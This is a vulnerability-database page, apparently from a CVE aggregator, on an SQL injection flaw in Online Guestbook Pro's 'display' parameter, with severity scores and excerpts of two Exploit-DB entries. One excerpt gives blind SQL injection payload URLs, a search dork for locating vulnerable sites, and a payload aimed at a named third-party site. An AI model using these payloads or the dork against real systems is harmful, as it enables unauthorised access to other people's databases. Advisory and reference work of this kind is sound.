CVE-2009-4935
published 2010-07-12CVE-2009-4935: SQL injection vulnerability in ogp_show.php in Online Guestbook Pro allows remote attackers to execute arbitrary SQL commands via the display parameter.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.92%
55.6th percentile
SQL injection vulnerability in ogp_show.php in Online Guestbook Pro allows remote attackers to execute arbitrary SQL commands via the display parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Esoftpro Online Guestbook Pro - Multiple Vulnerabilities
exploitdb·2010-07-04
CVE-2010-4996 Esoftpro Online Guestbook Pro - Multiple Vulnerabilities
Esoftpro Online Guestbook Pro - Multiple Vulnerabilities
---
Exploit Title: Esoftpro Online Guestbook Pro Multiple Vulnerability
Vendor url:http://www.esoftpro.com/
Version:5.1
Author: L0rd CrusAd3r aka VSN [[email protected]]
Published: 2010-07-4
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat,
Sai, KD, M4n0j.
Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com
Shoutzz:- To all ICW members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:
Online Guestbook Pro (formerly known as EGuest PRO) is an award-winning
comprehensive guestbook system based on the popular guestbook s
Exploit-DB
Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection
exploitdb·2009-04-17
CVE-2010-4996 Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection
Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection
---
Online Guestbook Pro (display) Blind SQL Injection Vulnerability
{____________________________________}
Author: Hussin X
Home : WwW.IQ-TY.CoM
email: darkangel_g85[at]Yahoo[DoT]com
{____________________________________}
script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php
DorK : Powered by Online Guestbook Pro
Demo :
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4
BuT Results = Forbidden :D
demo to any web
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and
No writeups or analysis indexed.
2010-07-12
Published